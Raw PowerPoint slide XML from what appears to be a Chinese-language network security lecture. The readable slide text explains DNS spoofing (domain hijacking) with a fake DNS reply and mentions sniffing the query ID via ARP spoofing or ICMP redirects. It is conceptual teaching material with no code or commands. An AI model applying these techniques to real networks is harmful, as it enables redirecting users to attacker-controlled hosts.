                                      <p:cBhvr>
                                        <p:cTn id="84" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="19"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="8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9" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="10" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="11" grpId="0" animBg="1"/>
      <p:bldP spid="12" grpId="0" animBg="1"/>
      <p:bldP spid="14" grpId="0" animBg="1"/>
      <p:bldP spid="15" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="18" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="19" grpId="0" bldLvl="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bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchorCtr="0" compatLnSpc="1"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{364857B9-7B62-4F81-9C37-48265A6B9EB4}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="225282" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>欺骗（域名劫持）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79876" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1981200" y="2895600"/>
            <a:ext cx="657225" cy="379413"/>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zh-CN" altLang="en-US" sz="1800" b="1"/>
              <a:t>用户</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79877" name="Line 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3346450" y="2938463"/>
            <a:ext cx="1871663"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78" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3104201" y="2276475"/>
            <a:ext cx="2297425" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>请问</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.usa.com</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRP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a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79879" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5246688" y="2894013"/>
            <a:ext cx="1763712" cy="379412"/>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en-US" altLang="zh-CN" sz="1800" b="1"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1"/>
              <a:t>服务器</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79880" name="Line 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3321050" y="3201988"/>
            <a:ext cx="18002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1" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3062288" y="3230563"/>
            <a:ext cx="24574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0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.usa.com</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRP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地址是199.6.6.9</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17418" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4872038" y="4452938"/>
            <a:ext cx="1925637" cy="379412"/>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en-US" altLang="zh-CN" sz="1800" b="1"/>
              <a:t>hack.haha.com</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17419" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5454650" y="4105275"/>
            <a:ext cx="644525" cy="3667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0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>主机</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79884" name="Line 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2305050" y="3429000"/>
            <a:ext cx="0" cy="1223963"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="FF6600"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79885" name="Line 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2305050" y="4652963"/>
            <a:ext cx="24479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6" name="Text Box 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2692400" y="4221163"/>
            <a:ext cx="1187450" cy="369887"/>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9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>访问</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WEB</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
              <a:solidFill>
                <a:srgbClr val="FF9900"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="225298" name="Text Box 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="214313" y="2857500"/>
            <a:ext cx="1843087" cy="6461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0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>返回假</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>地址：</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>202.109.2.2</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="225300" name="Text Box 20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1928813" y="4714875"/>
            <a:ext cx="27495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FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.usa.com</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1">
              <a:solidFill>
                <a:srgbClr val="FF9900"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>地址是</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>202.109.2.2</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1000125" y="1857375"/>
            <a:ext cx="2143125" cy="369888"/>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zh-CN" altLang="en-US" sz="1800" b="1"/>
              <a:t>假冒</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1"/>
              <a:t>（攻击者）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Line 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2357438" y="2214563"/>
            <a:ext cx="142875" cy="642937"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="FF6600"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Line 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1851025" y="2286000"/>
            <a:ext cx="149225" cy="571500"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="FF6600"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyP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8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="31" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="17418"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="32" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="174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additive="base">
                                        <p:cTn id="35" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="17419"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="36"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animBg="1"/>
      <p:bldP spid="17419" grpId="0"/>
      <p:bldP spid="225298" grpId="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="225300" grpId="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="19" grpId="0" animBg="1"/>
      <p:bldP spid="20" grpId="0" animBg="1"/>
      <p:bldP spid="2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zh-CN" smtClean="0"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>欺骗</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47108" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>难点在于如何获得标识号</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>可以结合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>欺骗或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>重定向等手段，采用嗅探的方法得到</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Effect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47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108">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47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伪装本地</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="147459" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>域名服务协议安全威胁</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="147458" name="灯片编号占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="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3EBB01A0-8B2A-4D61-8361-DA1EFEA2F8F9}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
              </a:rPr>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="898989"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="501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0" y="32845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573463"/>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Box 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6443663" y="4652963"/>
            <a:ext cx="1217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0183" name="TextBox 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1485900" y="4292600"/>
            <a:ext cx="1211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受害客户端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0184" name="Freeform 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-696801">
            <a:off x="2451100" y="3648075"/>
            <a:ext cx="2951163" cy="684213"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 932652 w 3408218"/>
              <a:gd name="T1" fmla="*/ 4903784 h 498763"/>
              <a:gd name="T2" fmla="*/ 471201 w 3408218"/>
              <a:gd name="T3" fmla="*/ 7764298 h 498763"/>
              <a:gd name="T4" fmla="*/ 0 w 3408218"/>
              <a:gd name="T5" fmla="*/ 0 h 498763"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 3408218"/>
              <a:gd name="T10" fmla="*/ 0 h 498763"/>
              <a:gd name="T11" fmla="*/ 3408218 w 3408218"/>
              <a:gd name="T12" fmla="*/ 498763 h 498763"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="3408218" h="498763">
                <a:moveTo>
                  <a:pt x="3408218" y="285008"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="2849088" y="391885"/>
                  <a:pt x="2289958" y="498763"/>
                  <a:pt x="1721922" y="451262"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1153886" y="403761"/>
                  <a:pt x="0" y="0"/>
                  <a:pt x="0"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185" name="Freeform 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2555875" y="3429000"/>
            <a:ext cx="2663825" cy="144463"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 3313215"/>
              <a:gd name="T1" fmla="*/ 3 h 455220"/>
              <a:gd name="T2" fmla="*/ 240057 w 3313215"/>
              <a:gd name="T3" fmla="*/ 2 h 455220"/>
              <a:gd name="T4" fmla="*/ 465109 w 3313215"/>
              <a:gd name="T5" fmla="*/ 15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186" name="TextBox 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2627313" y="2781300"/>
            <a:ext cx="2520950"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
        <p:nvSpPr>
          <p:cNvPr id="50187" name="TextBox 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2843213" y="4076700"/>
            <a:ext cx="3240087"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www.example.org=1.1.1.1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pic>
        <p:nvPicPr>
          <p:cNvPr id="501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725" y="292417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9" name="Freeform 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="795717">
            <a:off x="6245225" y="3429000"/>
            <a:ext cx="647700" cy="215900"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 3313215"/>
              <a:gd name="T1" fmla="*/ 92 h 455220"/>
              <a:gd name="T2" fmla="*/ 1 w 3313215"/>
              <a:gd name="T3" fmla="*/ 77 h 455220"/>
              <a:gd name="T4" fmla="*/ 1 w 3313215"/>
              <a:gd name="T5" fmla="*/ 553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prstDash val="dash"/>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0191" name="TextBox 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5364163" y="2492375"/>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zh-CN" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>攻击者</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="50180"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="50180"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
